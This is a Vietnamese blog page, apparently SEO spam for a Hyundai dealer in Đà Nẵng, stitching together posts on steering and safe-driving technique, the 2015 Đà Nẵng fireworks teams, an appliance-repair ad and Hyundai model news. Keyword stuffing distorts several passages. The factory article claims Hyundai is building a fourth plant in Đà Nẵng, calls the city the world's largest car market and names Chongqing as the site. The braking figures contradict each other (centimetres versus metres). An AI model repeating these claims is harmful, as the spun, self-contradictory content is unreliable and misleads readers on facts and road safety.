kỹ thuật quay vô lăng nhanh và an toàn-hyundai

Kỹ thuật quay vô-lăng nhanh đặc biệt quan trọng đối với người cầm lái, nhất là trong những tình huống nguy hiểm và sử lý phức tạp. Thông thường kỹ thuật này được sử dụng để khắc phục khẩn cấp sai lầm khi điều khiển xe. Có một số phương án xứ lý: quay vô-lăng một tay, cả hai tay kế tiếp nhau, một-hai hoặc hai-một. Trong tất cả các trường hợp trên, để đảm bảo quay vô-lăng trên 180^o với tốc độ nhanh, cần áp dụng kỹ thuật bắt vô-lăng chéo tay, dù kỹ thuật này có vẻ như trái ngược với hình dung về lái xe của nhiều người. Nhưng trên thực tế bắt chéo tay là yếu tố quan trọng trong việc quay vô-lăng nhanh, giảm thời gian thao tác.

>> xem thêm tại xe hyundai da nang | xe hyundai đà nẵng

A. Quay vô-lăng sang phải bằng một tay:

1. Đặt tay phải vào vị trí cao nhất trên vô-lăng.

2. Nới lỏng tay nắm vô-lăng bình thường

3. Sử dụng long bàn tay quay vô-lăng xuống điểm thấp nhất.

4. Quay vô-lăng với hướng chuyển dần lên cạnh bàn tay

5. Tiếp tục quay vô-lăng và chuyển sang cách nắm bình thường.

6. Quay vô-lăng lên điểm cao nhất.

B. Quay vô-lăng sang phải bằng hai tay với kỹ thuật bắt chéo tay:

1. Tay trên vô-lăng ở vị trí bình thường.

2. Quay vô-lăng đến thời điểm chuẩn bị bắt chéo tay phải.

3. Quay vô-lăng bằng tay trái cùng lúc bắt đầu bắt chéo tay phải.

4. Quay vô-lăng sau khi bắt chéo tay phải đến thời điểm chuẩn bị bắt tay trái.

5. Quay bằng tay phải và bắt chéo tay trái.

6. Quay vô-lăng sau khi chéo tay trái và nắm vô-lăng bằng tay phải.

Như vậy, thời điểm quay vô-lăng đầu tiên được thực hiện bằng hai tay từ vị trí “9-3” hoặc “10-2” (Tương tự chỉ số trên mặt đồng hồ) đến thời điểm khi tay trái đến gần con số 11, còn tay phải đến con số 5. Tiếp theo, tay phải nhanh chóng chuyển đến nắm vị trí con số 12.

Một điểm quan trọng là việc chuyển tay nắm vô-lăng ở điểm cao nhất không được thực hiện quá mạnh, như đập vào vô-lăng. Điều này, chỉ có thể được chấp nhận, trong trường hợp cổ tay phải vào thời điểm chuyển nắm và chuyển động theo cung tròn với vận tốc chuyển động tay từ vị trí “5” đến vị trí “12”, đồng thời hướng tay theo chiều chuyển động của vô-lăng. Thao tác này kết thúc tại vị trí khoảng giữa “1” và “2”. Ta phải tập trung toàn lực, còn tay trái bắt đầu bắt chéo: di chuyển nhanh lên trên từ vị trí “5” đến vị trí “12” và nhẹ nhàng nắm vô-lăng.Tất cả quá trình quay vô lăng diễn ra trong khoảng từ “1” đến “5”. Việc quay vô-lăng có thể nói bao gồm các chuyển động kéo nối tiếp nhau.

Nếu thật sự làm chủ được tay lái và tốc độ xe khi vào cua thì không nhất thiết phải nắm vô-lăng ở vị trí chuẩn quy định. Nếu tính được góc độ quay vô- lăng cần thiết, nên chọn vị trí nắm của 2 tay thật hợp lý để khi vào cua, khi đòi hỏi sự tập trung cao và quay vô-lăng chính xác, cả 2 tay sẽ đều thao tác nhanh nhất.

                                                                      xe hyundai đà nẵng

C. Chọn điểm nắm vô-lăng để chuẩn bị vào cua trái:

1. Đặt tay vào vị trí khi bắt đằu chuẩn bị vào cua.

2. Chọn điểm nắm cần thiết ngay trước khi bắt đầu quay vô-lăng vào cua.

3. Quay vô-lăng sang trái ( tay trái quay vô-lăng, tay phải trượt theo vô-lăng).

4. Chuyển tay về vị trí bình thường.

Trên 50% tai nạn giao thông xảy ra do người cầm lái không thành thạo kỹ thuật quay vô-lăng nhanh. Vào thời điểm mất ổn định đầu tiên của xe, bất kỳ chuyển động bất thường của cầu sau đều được các tài xế dày dặn nhận ra ngay sau 0,3-0,5s. Chính kỹ thuật quay vô-lăng thành thạo sẽ ngăn chặn được tiến triển bất lợi của xe.

D. Phương pháp “mạnh”

Phương pháp “mạnh” được sử dụng trong trường hợp khẩn cấp: xe có dấu hiệu mất ổn định theo chiều ngang. Nếu vận tốc xe không lớn và tài xế kịp thời dự đoán trước được tình huống cũng như trong trường hợp làm chủ tay lái xe sau khi chèn vào vật cản naod đó. Quay vô-lăng bằng phương pháp “mạnh” có thể thực hiện bằng một hoặc hai tay đồng thời cần chuyển bắt chéo tay từ vị trí chuẩn “10-2” với góc độ đến 140⁰_.Ngoài ra, nó còn thực hiện thao tác nối tiếp nhau của hai tay.

Ví dụ trường hợp quay vô-lăng sang phải bằng phương pháp “mạnh”:

1. Đặt tay ở vị trí cần thiết.

2. Tay phải quay vô-lăng sang phải, tay trái trược xuống dưới.

3. Nắm vô-lăng ở điểm dưới

4. Tay trái quay vô-lăng, tay phải trượt lên trên

Trả vô-lăng sau khi cua có thể thực hiện bằng phương pháp quay tốc độ hoặc phương pháp manh. Tuy nhiên, trên thực tế tài xế thường bỏ vô-lăng và đợi nó về vị trí ban đầu. Theo quan điểm an toàn, đây là không thể chấp nhận. Nếu hệ thống lái không được chỉnh chính xác, vô-lăng có thể bị kẹt không quay về vị trí ban đầu, và khi đó mọi thao tác xử lý dù nhanh đến đâu cũng khó cứu vẵn được tình thế bất ngờ

Xin Mời Đọc Tiếp ...

Kỹ năng cần rèn luyện để trở thành tay lái giỏi

Có thể bạn đã cảm thấy mình là “tay lái lụa”, nắm vững các kỹ thuật điều khiển xe. Vậy bạn thử kiểm tra xem câu trả lời của mình có giống với câu trả lời của những người vượt hàng trăm nghìn km mà chưa từng xảy ra tai nạn không?

• xe hyundai da nang / xe hyundai da nang

1- Yếu tố nào là quan trọng nhất để lái xe?

Có 2 yếu tố.

+ Thứ nhất, đó là kiến thức kỹ thuật cao.

+ Thứ hai là khả năng phán đoán và đánh giá tình huống.

Để trở thành một tài xế giỏi, cần có 2 kỹ năng này và biết áp dụng chúng đồng thời.

2- Điều gì quan trọng hơn đối với tài xế - khoẻ mạnh về thể lực hay tinh thần?

Những yếu tố này không thể tách rời nhau. Phản xạ nhanh của tài xế không chỉ phụ thuộc vào cơ bắp , mà còn phụ thuộc vào nhận thức cần thực hiện thao tác này hay thao tác khác hay không.

3- Có tồn tại kỹ thuật đặc biệt nào được coi là ưu việt hơn các kỹ thuật lái xe khác?

 

Kỹ thuật lái xe tốt nhất được coi là kỹ thuật “tự vệ”. Người cầm lái càng cẩn thận và bình tĩnh thì lái xe càng an toàn. Tất nhiên, kiềm chế được mình trong làn xe cộ đông đúc không phải là chuyện dễ dàng, nhưng đó mới là đức tính của một tài xế giỏi.

4- Khoảng cách nào luôn phải giữ đối với các xe khác?

Phép tính rất đơn giản: một thân xe cho 15km/h của vận tốc. Cũng có cách tính đơn giản hơn – theo thời gian. Khoảng cách cần tính là 2 giây. Hãy chọn vật định hướng mà chiếc xe đi trước vừa chạy qua. Nếu xe của bạn chạy qua trước 2 giây thì có nghĩa là khoảng cách chưa đủ.

5- Vị trí tay trên vô-lăng thế nào được coi là đúng?

Người ta thường được dạy hãy coi vô-lăng như mặt đồng hồ và vị trí đúng nhất là tay trái đặt ở số 9, tay phải- số 2. Tuy nhiên, vị trí 10 và 3 được ưa thích hơn do đảm bảo độ cơ động cao hơn và cơ tay đỡ mỏi hơn - điều này rất quan trọng khi đi đường trường.

6- Trạng thái nào cho phép người lái “sẵn sàng” cho những chuyến đi xa nhiều giờ đồng hồ?

Phương pháp tốt nhất bảo đảm sự minh mẫn và phản xạ nhanh nhạy cho người lái chính là sự luôn sẵn sàng của toàn bộ cơ thể, hay cụ thể hơn là tư thế ngồi hợp lý. Không nên ngồi trong tư thế “co ro” và phải “lắng nghe” chiếc xe của mình bằng cả cơ thể. Vòng cua quá gấp sẽ được các cơ hông cảm nhận đầu tiên, còn sau đó mới đến tay cảm nhận “sự bất thường”. Chính vì vậy người lái phải ngồi trong tư thế thoải mái, nhưng không quá “thư giãn” để mất đi cảm nhận từ xe và mặt đường một cách kịp thời.

7- Có phải vận tốc tối đa ghi trên biển báo là luôn luôn đúng?

Không phải. Giới hạn vận tốc trên đường luôn được xác định đối với các điều kiện tối ưu, còn trong điều kiện giao thông đông đúc, trời tối hay đường xấu thì lẽ dĩ nhiên cần đi chậm hơn, nhơng cũng không nên quá chậm để tránh gây cản trở cho các xe khác. Tốt nhất nên đi với cùng tốc độ như các xe khác.

8- Rẽ trái như thế nào tại ngã tư đông xe cộ?

Không vội vã quay vô-lăng khi đi xe hyundai da nang. Khi nhường các xe chạy ngược chiều nên giữ vị trí bánh xe thẳng. Đó là một trong các nguyên tắc an toàn cơ bản của kỹ thuật lái xe: nếu bánh xe quay sang trái thì khi bị đâm từ phía sau, xe sẽ bị hất sang làn đường ngược chiều và tai nạn là khó tránh. Trong trường hợp như vậy, xe của bạn sẽ chiếm nhiều chỗ hơn , tăng thêm độ nguy hiểm và cản trở các xe khác

9- Làm gì nếu xe phía trước thu hẹp khoảng cách an toàn?

Rất thường xảy ra việc xe bạn chạy sau chiếc xe nào đó với khoảng cách an toàn, nhưng tài xế trước “ cố tình” rút ngắn khoảng cách đó: bạn giảm tốc độ xe trước cũng giảm tốc độ. Khi đó phải luôn ghi nhớ rằng không bao giờ “cảm xúc” được vượt qua lý trí; hoặc báo hiệu xin vượt, hoặc bình tĩnh giữ khoảng cách an toàn.

Để thực sự trở thành một tài xế giỏi, cần phải ghi nhớ 3 nguyên tắc:

- Đường giao thông không phải đường đua, không phóng nhanh, vượt ẩu. Luôn lịch sự và giúp đỡ các tài xế khác vì không loại trừ khả năng có lúc bạn cũng cần sự giúp đỡ của họ.

- Không tự cô lập mình – hãy báo hiệu trước cho các tài xế khác về ý định của mình như chuẩn bị rẽ, vượt, đỗ…

- Luôn luôn biết mình đang làm gì – đó là nguyên tắc quan trọng nhất. Hãy nhớ rằng lái xe là công việc không dễ dàng và lái xe giỏi phải là lái xe an toàn.

Xin Mời Đọc Tiếp ...

KỸ THUẬT LÁI XE OTO AN TOÀN

KỸ THUẬT LÁI XE AN TOÀN

 

Lái xe hyundai da nang ôtô là một môn thể thao thực thụ. Để điều khiển thành thạo ôtô cần phải có sức khoẻ, ý chí, cá tính, sự tập luyện, tính kiên nhẫn và thói quen tập trung, nhưng tất cả những cái đó chỉ có thể rèn luyện hoàn thiện thong quá trình thực tế lái xe và thâm niên cầm vô-lăng.

1- Trước hết xe hyundai đà nẵng , một trong những yếu tố quan trọng nhất ảnh hưởng tới sự an toàn trong lái xe là tốc độ. Những người lái xe đều biết rằng, còn gì thú hơn, khi được lướt với tốc độ hơn 100km/h trên đường vắng vẻ, nắng vàng rực rỡ cảnh thiên nhiên hữu tình, nhưng khônh phải ai cũng biết và ý thức được rằng chính những lúc lái xe với tốc độ cao như vậy lại dễ xảy ra tai nạn nhất, do người lái thường chủ quan nên không làm chủ được tay lái và không xử lý tình huống kịp thời.

2- Thời tiết cũng có ảnh hưởng không nhỏ tới việc lái xe không an toàn. Ví dụ khi trời khô ráo, xe đang chạy với tốc độ 60km/h, khi bắt buộc phải phanh gấp thì ôtô sẽ bị trượt đi khoảng 40-45cm, còn khi trời mưa thì khoảng cách bị trượt sẽ từ 90 đến 140m!!!.

3- Ban đêm, người lái xe thường có cảm giác xe chạy chậm hơn ban ngày mặc dù chạy cùng 1 tốc độ vì người lái xe không thấy rõ các cảnh vật lướt qua sau cửa kính xe. Do đó, người lái xe - nhất là người mới cầm lái thiếu kinh nghiệm thường có xu hường tăng tốc khi lái xe ban đêm và thế là tai nạn có thể xảy ra.

4- Khi tránh một chiếc ôtô khác chạy ngược chiều, người lái thường có cảm giác đường không đủ rộng và tốc độ của xe chạy ngược chiều càng cao thì cảm giác đó càng mạnh. Một số lái xe ít kinh nghiệm, do cảm giác sợ bị va quệt nên vào thời điểm tránh nhau thường bẻ tay lái gấp và như vậy có thể dẫn đến tai nạn đáng tiếc.

5- Ban đêm xe hyundai da nang, thỉnh thoảng do lái xe quá mệt mỏi vì khi lái xe đường dài, người lái xe có thể nhìn thấy ảo ảnh trên đường. Các hiện tượng ảo ảnh này rất đa dạng, nó có thể là một con thú chạy qua đường, một căn nhà đứng sừng sững giữa đường hoặc có thể là những vật thể không rõ hình dáng. Trong những trường hợp như vậy, theo phản xạ tự nhiên, người lái xe thường phanh gấp hay là bẻ mạnh vô-lăng và chỉ sau đó mới ngỡ ngàng nhận ra rằng không hề có một chướng ngại vật gì trước mặt. Thật đáng tiếc đó là một sai lầm hết sức nghiêm trọng vì thực tế hoàn toàn có thể xuất hiện những chướng ngại vật có thật trên đường. Những biện pháp thông thường để ngăn ngừa hiện tượng ảo ảnh như trò chuyện với bạn đồng hành, nghe đài… đều không có tác dụng. Cách duy nhất để phòng hiện tượng này đó là ngủ đủ giấc hoặc có sự nghỉ ngơi, dù chỉ là ngắn ngủi.

Xin Mời Đọc Tiếp ...

Các nước tham dự cuộc thi trình diễn Pháo Hoa Đà Nẵng năm 2015

Giới thiệu về đội Ba Lan tham dự cuộc thi trình diễn Pháo Hoa Đà Nẵng năm 2015 

Tên: Surex Firma Rodzinna (viết tắt là Surex)
Đến từ: Ba Lan (Châu Âu)

5 Nước sẽ tham gia vào kỳ bắn pháo hoa 30/4 -2015 tại thành phố đà nẵng

Surex Firma Rodzinna là công ty pháo hoa hàng đầu châu Âu có trụ sở tại Ba Lan. Họ đã tham gia vào nhiều sự kiện pháo hoa quốc tế và đạt nhiều giải thưởng quốc tế cao nhất tại các cuộc thi pháo hoa quốc tế toàn cầu.

Ba Lan chưa từng tham gia trình diễn tại DIFC. Vì vậy Ba Lan được xem như là một ẩn số, lần đầu tiên tham dự tại DIFC và họ sẽ là một đội mạnh để tranh tài tại DIFC2015. Chúng ta kỳ vọng và chờ xem Surex Firma Rodzinna sẽ mang đến cho DIFC2015 một màn trình diễn tuyệt vời và ngoạn mục như thế nào 

Những thành tích nổi bật của Surex 

- Giải nhất Cuộc thi Pháo hoa quốc tế Pohang, Hàn Quốc - tháng 7 năm 2014

- Giải nhất Giải Vô địch Pháo hoa châu Âu tại Neufeld/ Leitha, Áo 2012

- Giải nhất Cuộc thi Pháo hoa quốc tế lần thứ 10 tại Courchevel - Pháp, 2012

- Giải nhất Cuộc thi Pháo hoa quốc tế Monte Carlo 2011

- Giải nhất Giải Vô địch Pháo hoa thế giới tại Berlin, Đức 2011

- Giải nhất Cuộc thi Pháo hoa quốc tế Knokke Heist, Bỉ 2011

- Giải nhất Cuộc thi Pháo hoa quốc tế Busan, Hàn Quốc 2011

- Giải nhất Lễ hội Pháo hoa nghệ thuật Cannes, Pháp 2010

- Giải nhất Lễ hội Pháo hoa quốc tế Sokolov, CH Séc 2009

---

Đội Mỹ

Đội pháo hoa Mỹ (Công ty Melrose Pyrotechnics). Truyền thống trình diễn pháo hoa của Melrose Pyrotechnics khởi đầu từ những năm 1960 ở Melrose Park, Illinois, Hoa Kỳ, khi cha của ông Mike Cartolano, hiện là Chủ tịch của Melrose Pyrotechnics, đã kết hợp với đội bóng chày Chicago White Sox xây dựng một màn trình diễn pháo hoa trên bảng tỉ số. Đến những năm đầu thập kỷ 1980, dưới sự dẫn dắt của Mike, Melrose Pyrotechnics trở thành một trong những công ty đầu tiên áp dụng công nghệ bắn điện tử, mở ra một kỷ nguyên mới cho công ty cũng như cho ngành công nghiệp pháo hoa theo nhạc.

Melrose Pyrotechnics là nơi công nghệ kết hợp với truyền thống.Họ nổi tiếng với thương hiệu về sự say mê và tài năng, được bổ trợ với những kĩ thuật pháo hoa tốt nhất và rực rỡ nhất. Với các sự kiện pháo hoa theo nhạc, họ kết hợp giữa sản phẩm âm nhạc chuyên nghiệp của các nhạc sĩ tài năng với sự lập trình chuẩn xác của các kỹ thuật viên điêu luyện để làm ra những màn trình diễn bừng sáng bầu trời, sân vận động hay cả trí tưởng tượng của con người.

Giải thưởng quốc tế của đội Mỹ

• 2011 Lễ hội pháo hoa Hanabi World Cup, Nagasaki, Nhật Bản: Giải nhì
• 2010 Lễ hội Pháo hoa Hanabi World Cup, Nagasaki, Nhật Bản: Giải nhất
• 2009 Lễ hội Ánh sáng Quốc tế Quebec, Montreal, Canada: Giải ba
• 2007 Lễ hội Pháo hoa Âm nhạc Quốc tế Thượng Hải, Trung Quốc: Giải nhất
• 2006 Lễ hội Ánh sáng Quốc tế Quebec, Montreal, Canada: Giải nhất

---

Đội Nam Phi

Giới thiệu đội đại diện Châu Phi tham dự cuộc trình diễn Pháo Hoa Đà Nẵng năm 2015
Tên đội: Fireworks for Africa
Đến từ: Nam Phi
Website: www.fireworks.co.za

Công ty Fireworks for Africa là tác giả của màn trình diễn pháo hoa ngoạn mục tại FIFA World Cup 2010. Đội FFA đã thắp sáng bầu trời tại Đại hội FIFA, Hòa nhạc khởi động World Cup 2010 và lễ khai mạc và bế mạc World Cup 2010. Họ đã tham dự và giành giải nhất tại nhiều cuộc thi pháo hoa quốc tế.

Fireworks for Afica chưa từng tham dự tại DIFC, đây sẽ là ẩn số thứ 2 cho cuộc thị này

Một trong những màn trình diễn của đội Fireworks for Africa

Với những thành tích mà Fireworks for Africa đạt được, Chúng ta kỳ vọng Đội Nam Phi sẽ đem đến một màn trình diễn xuất sắc, họ sẽ đem lại một không khí tươi mới đến với Cuộc thi.
Những thành tích nổi bật của Fireworks for Africa
- Giải nhất Lễ hội Pháo hoa quốc tế Knokke-Heist, Bỉ 2008
- Giải nhì Cuộc thi Pháo hoa quốc tế lần thứ 17 tại Hannover, Herrenhausen 2007
- Giải Khán giả bình chọn Cuộc thi pháo hoa quốc tế Ignis Brunensis, Brno, CH Séc 2007
- Giải nhất Lễ hội pháo hoa KFM Symphony of Fire tại Cape Town 2006
- Giải nhất Lễ hội Ánh sáng Casino du Lac-Laemy tại Hull, Canada 2005
- Giải ba Giải Vô địch Pháo hoa thế giới lần thứ 5 tại San Remo, Ý 2001
- Giải nhất Lễ hội Ánh sáng Loto-Quebec tại Quebec, Canada 2001
- Giải nhất Lễ hội Ánh sáng Casino du Lac-Laemy tại Hull, Canada 2001
- Giải nhất Lễ hội Ánh sáng Casino du Lac-Laemy tại Hull, Canada 2000
- Giải nhất Lễ hội Ánh sáng Loto-Quebec tại Quebec, Canada 2000

---

Đội Úc

Giới thiệu về đội đại diện cho nước Australia tham dự cuộc thi trình diễn Pháo Hoa Đà Nẵng năm 2015
Tên đội: Howard & Son Fireworks 
Đến từ: Australia (Úc)
Website: http://www.howardsfireworks.com.au

Howard & Sons Fireworks là một trong những công ty pháo hoa thành công nhất tại Úc, nổi tiếng với những màn trình diễn tuyệt vời tại các sự kiện lớn trên khắp thế giới. Ngày nay, các kỹ thuật viên pháo hoa thế hệ thứ tư tiếp tục sự nghiệp của dòng họ Howard, mang đến một động lực và sức sáng tạo mới mẻ tạo nên câu chuyện thành công trong nước và cả quốc tế mang tên công ty Pháo hoa Howard & Sons.

Một trong những màn trình diễn của đội Úc ở các cuộc thi quốc tế

Howard & Sons Fireworks đã tham gia vào nhiều sự kiện pháo hoa quốc tế và đạt nhiều giải thưởng. Họ có rất nhiều kinh nghiệm và sẽ đem đến một màn trình diễn ngoạn mục cho DIFC2015. Công ty này hiện nay là một đội ngũ những nhà thiết kế trẻ rất sáng tạo và đầy ắp những ý tưởng mới cho phần trình diễn của mình.

Những thành tích nổi bật của Howard & Sons Fireworks
- 2014 Cuộc thi Pháo hoa quốc tế Pohang, Hàn Quốc
- 2011 Giải đồng Cuộc thi Pháo hoa quốc tế Montreal, Canada
- 2010 Giải Vô địch pháo hoa thế giới tại Muscat, Oman
- 2010 Cuộc thi Pháo hoa theo nhạc quốc tế tại Manila, Philippine
- 2009 Giải ba Cuộc thi Trình diễn pháo hoa quốc tế Đà Nẵng, Việt Nam
- 2008 Giải bạc Cuộc thi Pháo hoa quốc tế Montreal
- 2007 Giải nhất Cuộc thi Pháo hoa quốc tế Malaysia
- 1988 Huy chương vàng Cuộc thi Pháo hoa quốc tế Monaco

---

Đội VietNam

Đội Việt Nam - THÀNH PHỐ ĐÀ NẴNG

Đội pháo hoa Việt Nam: Tự tin so tài cùng đối thủ, đến cuộc thi năm 2011 với chủ đề "Lung linh sông Hàn"
Đội Việt Nam chỉ mới xuất hiện trên trường bắn pháo hoa quốc tế vào tháng 3 năm 2008. Đội bắn pháo hoa chuyên nghiệp của thành phố Đà Nẵng đại diện cho Việt Nam tham gia Cuộc thi bắn pháo hoa quốc tế Đà Nẵng lần thứ nhất - năm 2008, lần thứ 2 - năm 2009 và lần thứ 3 - năm 2010.
Pháo hoa của Việt Nam thể hiện những nét đẹp của đất nước, vẻ đẹp và lòng mến khách của con người Việt Nam. Trong 20 năm qua, Đội Việt Nam đã sản xuất và có những màn trình diễn pháo hoa trong các dịp Quốc khánh, Tết cổ truyền của dân tộc và các sự kiện trọng đại của đất nước.
Đến với DIFC 2011, Đội Việt Nam sẽ làm khán giả ngỡ ngàng với phần trình diễn của mình. Pháo hoa được bắn lên theo nền nhạc do nhà soạn nhạc địa phương viết riêng cho đội nhà.

Xin Mời Đọc Tiếp ...

trung tâm chuyên nhận sửa máy điều hòa miễn phí

TRUNG TÂM DỊCH VỤ KỸ THUẬT ĐIỆN TỬ ĐIỆN LẠNH

* Nhận sua may dieu hoa tai da nang bảo dưỡng lắp đặt định kỳ tại nhà & cơ quan
* Sửa điều hoà không chạy, kém lạnh, hỏng mạch ,
* chảy nước, thủng giàn, hết ga, hỏng Block …
* Cung cấp tận nơi tay điều khiển chính hãng …
* Dịch chuyển vị trí lắp đặt tại nhà riêng & Cty
>> sua lo vi song tai da nang

- Khi khối ngoài trời bắt đầu chạy thì điện lưới bị ngắt ( nhảy attomát – quá tải )

Phương châm: “CHỮ TÍN DÀNH CHỌN NIỀM TIN”
hãy gọi cho chúng tôi ngay khi thiết bị điện lạnh kho xưởng của cty, nhà bạn có vấn đề chúng tôi rất hân hạnh được phục vụ quý khách. Sự hài lòng của quý khách là niềm vinh hạnh của chúng tôi.

Trung tâm điện tử điện lạnh đà nẵng chuyên sửa chữa điều hòa tại nhà các hãng: sửa điều hòa Electrolux, sửa điều hòa LG, sửa điều hòa Hitachi, sửa điều hòa Samsung, sửa điều hòa Sanyo, sửa điều hòa Toshiba, sửa điều hòa Panasonic, sửa điều hòa Sharp, sửa chữa điều hòa Daewoo…v..v Nhận sửa chữa,vệ sinh, nạp ga điều hòa, bảo dưỡng điều hòa tại nhà – tại Hà Nội. Với chất lượng phục vụ Uy tín – Thương hiệu “Kỹ Thuật Bách Khoa”.

TỦ LẠNH, TỦ ĐÔNG, TỦ MÁT, TỦ BẢO ÔN, TỦ CôCa, TỦ Pepsi, TỦ BẢO QUẢN_ MÁY LÀM ĐÁ, TỦ ƯỚP RƯỢU, BIA, …TỦ CHỐNG ẨM .V..VV..

* Sửa tủ không lạnh, không chạy, kém lạnh, không đông đá ,
* Không xả tuyết, bị xì giàn, hỏng Blốc, tủ bị thủng ngăn đá, chạy không ngắt….
* Zoong cửa bị hỏng, hở, không sử dụng được …

MÁY GIẶT, MÁY SẤY QUẦN ÁO, TỦ SẤY QUẦN ÁO……(các hãng Âu, Á)

* Chuyên sua may dieu hoa tai da nang các loại Máy Giặt, Máy Sấy với các sự cố như:
* Sửa máy không hoạt động được , không vào điện , không giặt ,
* không vắt, không xả nước , không cấp nước , máy giặt bị kêu ,
* lỗi mạch điều khiển, không chạy hết chu trình…..
* Nhận cạp vá thùng máy giặt _Nhận làm vỏ máy giặt INOX


Trung Tâm Dịch Vụ Kỹ Thuật Điện Tử Điện Lạnh đà nẵng
Xin hân hạnh được phục vụ quý khách hàng !!!

Xin Mời Đọc Tiếp ...

Hyundai 2015 trình làng xe chống đạn

Hãng xe hyundai da nang Hàn Quốc mang tới triển lãm ôtô Mátxcơva một "ngôi sao" nặng ký: Equus Limousine Security bọc thép với trọng lượng gần 4 tấn & xe hyundai da nang .

  

 Hyundai Equus Limousine Security dài 5.460 mm và trọng lượng gần 4 tấn

Là sản phẩm hợp tác với hãng Đức Stoof International (chuyên sản xuất xe đặc biệt và xe chống đạn) và hãng độ Nga ArmorTech, Equus ra mắt khách hàng tiềm năng tại thị trường Nga với khả năng bảo vệ hành khách trước một số loại vũ khí và trọng lượng 3.840 kg.

Những trang bị đặc biệt khiến cân nặng của Equus tăng đột biến gồm gói pin bổ sung, cửa xe được gia cố, cửa sổ trượt thủy lực, hệ thống liên lạc nội bộ và bình xăng được bảo vệ.

Equus chống đạn ra mắt tại Moscow Motor Show 2012.

Mẫu sedan cỡ lớn có khả năng bảo vệ những người trong xe khỏi nhiều loại vũ khí. Khoang xe chống đạn của Equus được thiết kế để "bảo vệ toàn bộ không gian nội thất khỏi những đường đạn tấn công từ mọi góc độ", theo khẳng định của Hyundai.

Ngoài khả năng đặc biệt trên, Equus vẫn có cùng sức mạnh với các mẫu xe tiêu chuẩn. Động cơ 5 lít V8 công suất 429 mã lực.

Xin Mời Đọc Tiếp ...

xắp có nhà máy xe hyundai tại đà nẵng

Hãng sản xuất xe hơi xe hyundai da nang đang có kế hoạch xây nhà máy thứ tư ở đà nẵng với số vốn đầu tư khoảng 1.000 tỷ won (927 triệu USD).

xe hyundai da nang Hãng sản xuất xe hơi Hyundai của Hàn Quốc có kế hoạch xây nhà máy thứ tư ở đà nẵng với số vốn đầu tư vào khoảng 1.000 tỷ won (927 triệu USD) và đưa nhà máy này đi vào sản xuất trong năm 2016.

Động thái này được đưa ra trong bối cảnh hãng xe Hàn Quốc đang cùng với các hãng xe đối thủ tăng công suất sản xuất tại thị trường xe hơi lớn nhất thế giới này.
Nhà máy trên sẽ đánh dấu sự mở rộng lớn ở nước ngoài của hãng xe lớn thứ năm thế giới này khi mà hãng xe này rất thận trọng trong việc tăng công suất sản xuất trong hai năm qua do muốn tập trung vào việc cải thiện chất lượng xe.
Trong một tuyên bố, Hyundai cho hay Chủ tịch hãng Chung Mong-koo sẽ ký một thỏa thuận sơ bộ trong ngày 27/3 với chính quyền thành phố Trùng Khánh, nơi dự kiến sẽ đặt nhà máy trên.

Hiện hãng xe này đã có ba nhà máy ở hyundai đà nẵng.
xe Hyundai da nang cho hay nhà máy trên sẽ đưa tổng công suất sản xuất của Hyundai và chi nhánh Kia ở đà nẵng lên 2,3 triệu chiếc xe/năm so với mức dự báo 2 triệu chiếc vào cuối năm 2015.
Số vốn cấp cho nhà máy này sẽ lấy từ phía liên doanh của Hyundai ở hà nội.

Xin Mời Đọc Tiếp ...

hyundai thế hệ mới 2015-2016

Hãng xe hyundai đà nẵng vừa chính thức cho ra mắt chiếc concept Veloster tại triển lãm Busan Motor Show ở Hàn Quốc. các xe hyundai da nang Điều đặc biệt của chiếc concept này chính là Hyundai đã bố trí hệ thống động cơ nằm ở giữa xe (mid-engined). Concept mới của Hyundai được mang tên Hyundai Veloster Midship.

Hyundai Veloster Midship Concept được phát triển bởi bộ phận Hyundai’s High Performance Team, với những kỹ sư tài năng được biết đến với việc phát triển mẫu xe Hyundai i20 World Rally Car.

Với việc bố trị hệ thống động cơ ở giữa, Hyundai muốn chiếc Veloster Midship Concept thể hiện tính năng của một chiếc xe thể thao. Hệ thống động cơ được đặt sau ghế lái, nằm giữa trục bánh trước và bánh sau. Cách đặt động cơ như vậy sẽ giúp phân bố trọng lượng xe tốt hơn và nâng cao khả năng điều khiển xe. Bên cạnh đó Hyundai cũng muốn tìm hiểu thêm về độ ổn định trong vận hành cũng như sự an toàn của hệ khung gầm chiếc Veloster.

Hyndai Veloster Midship Concept được thiết kế chỗ ngồi 2+1, với hệ thống ghế ngồi kiểu thể thao với trọng lượng khá nhẹ. Chiếc xe có chiều dài 4.200 mm, chiều rộng 1.865 mm và chiều cao 1.340 mm, với kích thước này, mẫu concept mới của Hyundai rộng và thấp hơn phiên bản tiêu chuẩn của nó.

Ngoài ra, Hyundai tỏ ra khá tự hào với những thiết bị khác có mặt trên mẫu concept này như hệ thống treo, giảm xóc hiệu suất cao, hệ thống phanh được nâng cấp và hệ thống ống xả mới...

xe Hyundai da nang trang bị cho chiếc Veloster Midship Concept hệ thống động cơ Theta GDI 2.0 lít tăng áp, sản sinh công suất 296 mã lực.

Xin Mời Đọc Tiếp ...

Hyundai giới thiệu Sonata Eco 2015

Hyundai giới thiệu Sonata Eco 2015 với 7,35 lít/100 km.

xe hyundai da nang vừa chính thức giới thiệu một phiên bản tiết kiệm nhiên liệu - Eco - của xe Sonata 2015, với thông số trung bình 7,35 lít/100 km chỉ có ở xe hyundai đà nẵng .

Xe Hyundai Sonata Eco được trang bị động cơ 1,6 lít tăng áp, sản sinh công suất 177 mã lực và mô-men xoắn cực đại 264 Nm, đi kèm hộp số 7 cấp ly hợp kép hoàn toàn mới và hệ dẫn động bánh trước.

Chiếc sedan cỡ trung này có mức tiêu thụ nhiên liệu trong thành phố là 8,4 lít/100 km, trên đường cao tốc là 6,19 lít/100 km, và trung bình là 7,35 lít/100 km.

Xe Sonata Eco tiết kiệm nhiên liệu hơn 10% so với bản Sonata SE với trang bị động cơ 2,4 lít 4 xy-lanh, công suất 190 mã lực.

 

Hyundai hiện chưa công bố thông số về tính năng vận hành của bản Eco.

Trang bị tiêu chuẩn của phiên bản Eco gồm: màn hình cảm ứng 5 inch trên cụm điều khiển trung tâm, hệ thống đèn pha tự động, ghế lái 10 chế độ điều chỉnh điện, lưới tản nhiệt mạ crôm và camera lùi.

Gói nâng cấp từ xe hyundai da nang tùy chọn Technology Package gồm: hệ thống cảnh báo điểm mù, cảnh báo xe vượt phía sau, hỗ trợ chuyển làn, tính năng mở nắp cốp sau rảnh tay, tay nắm cửa mạ crôm, khóa bấm khởi động và ghế trước có sưởi, bọc da.

